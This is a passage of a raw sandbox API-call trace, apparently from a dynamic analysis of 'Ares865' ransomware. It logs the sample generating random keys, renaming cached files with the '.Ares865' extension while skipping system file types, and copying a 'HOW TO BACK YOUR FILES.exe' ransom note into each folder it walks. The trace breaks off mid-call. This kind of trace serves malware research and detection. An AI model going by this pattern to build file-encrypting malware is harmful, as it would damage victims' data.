[0110.720] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.720] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.720] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" | out: lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" [0110.720] lstrlenW (lpString="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 65 [0110.720] lstrlenW (lpString="Ares865") returned 7 [0110.720] lstrcmpiW (lpString1="0838585", lpString2="Ares865") returned -1 [0110.720] lstrlenW (lpString=".dll") returned 4 [0110.721] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2=".dll") returned 1 [0110.721] lstrlenW (lpString=".lnk") returned 4 [0110.721] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2=".lnk") returned 1 [0110.721] lstrlenW (lpString=".ini") returned 4 [0110.721] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2=".ini") returned 1 [0110.721] lstrlenW (lpString=".sys") returned 4 [0110.721] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2=".sys") returned 1 [0110.721] lstrlenW (lpString="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 65 [0110.721] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.Ares865") returned 155 [0110.721] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.ares865"), dwFlags=0x1) returned 1 [0110.723] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.723] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1611) returned 1 [0110.723] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.723] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.723] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.723] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.724] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.724] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.732] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.733] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.733] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.733] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" | out: lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" [0110.733] lstrlenW (lpString="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 65 [0110.733] lstrlenW (lpString="Ares865") returned 7 [0110.733] lstrcmpiW (lpString1="000C9C1", lpString2="Ares865") returned -1 [0110.733] lstrlenW (lpString=".dll") returned 4 [0110.733] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2=".dll") returned 1 [0110.734] lstrlenW (lpString=".lnk") returned 4 [0110.734] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2=".lnk") returned 1 [0110.734] lstrlenW (lpString=".ini") returned 4 [0110.734] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2=".ini") returned 1 [0110.734] lstrlenW (lpString=".sys") returned 4 [0110.734] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2=".sys") returned 1 [0110.734] lstrlenW (lpString="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 65 [0110.734] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.Ares865") returned 155 [0110.734] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.ares865"), dwFlags=0x1) returned 1 [0110.736] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.736] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1612) returned 1 [0110.736] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.736] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.736] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.736] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.737] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.737] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.749] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.749] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.749] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.750] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="F90F18257CBB4D84216AC1E1F3BB2C76" | out: lpString1="F90F18257CBB4D84216AC1E1F3BB2C76") returned="F90F18257CBB4D84216AC1E1F3BB2C76" [0110.750] lstrlenW (lpString="F90F18257CBB4D84216AC1E1F3BB2C76") returned 32 [0110.750] lstrlenW (lpString="Ares865") returned 7 [0110.750] lstrcmpiW (lpString1="3BB2C76", lpString2="Ares865") returned -1 [0110.750] lstrlenW (lpString=".dll") returned 4 [0110.750] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2=".dll") returned 1 [0110.750] lstrlenW (lpString=".lnk") returned 4 [0110.750] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2=".lnk") returned 1 [0110.750] lstrlenW (lpString=".ini") returned 4 [0110.750] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2=".ini") returned 1 [0110.750] lstrlenW (lpString=".sys") returned 4 [0110.750] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2=".sys") returned 1 [0110.750] lstrlenW (lpString="F90F18257CBB4D84216AC1E1F3BB2C76") returned 32 [0110.751] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76.Ares865") returned 122 [0110.751] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76.ares865"), dwFlags=0x1) returned 1 [0110.759] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.759] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=550) returned 1 [0110.759] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.760] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.760] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.760] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.760] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.760] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.761] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.762] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.762] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.763] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe" [0110.764] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe" [0110.764] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.764] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.764] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.765] GetLastError () returned 0x0 [0110.765] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.765] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.765] CloseHandle (hObject=0x120) returned 1 [0110.765] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.765] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x50d068e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d068e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.766] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.766] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.766] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Acrobat" | out: lpString1="Acrobat") returned="Acrobat" [0110.766] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0110.766] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2f00d8 [0110.766] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0110.766] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50d068e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50d068e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0110.766] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0110.766] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x50d068e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d068e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0110.766] lstrcmpiW (lpString1="Linguistics", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.766] lstrcmpiW (lpString1="Linguistics", lpString2="aoldtz.exe") returned 1 [0110.766] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Linguistics" | out: lpString1="Linguistics") returned="Linguistics" [0110.766] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0110.766] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x82) returned 0x2e95b0 [0110.766] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0110.766] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x50d068e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d068e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 0 [0110.766] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.766] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79b0 [0110.766] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics" [0110.767] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics" [0110.767] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.767] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.767] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.768] GetLastError () returned 0x0 [0110.768] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.768] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.768] CloseHandle (hObject=0x120) returned 1 [0110.768] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.768] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x50d068e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d068e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.768] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.768] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.769] lstrcpyW (in: lpString1=0x2cce482, lpString2="Dictionaries" | out: lpString1="Dictionaries") returned="Dictionaries" [0110.769] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0110.769] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9c) returned 0x2cfda8 [0110.769] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0110.769] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50d068e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50d068e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0110.769] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0110.769] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50d068e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50d068e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0110.769] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.769] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79b0 [0110.769] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries" [0110.769] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries" [0110.769] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.769] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.770] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.770] GetLastError () returned 0x0 [0110.770] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.770] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.770] CloseHandle (hObject=0x120) returned 1 [0110.771] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.771] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x50d068e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d068e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.771] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.771] lstrcmpiW (lpString1=".", 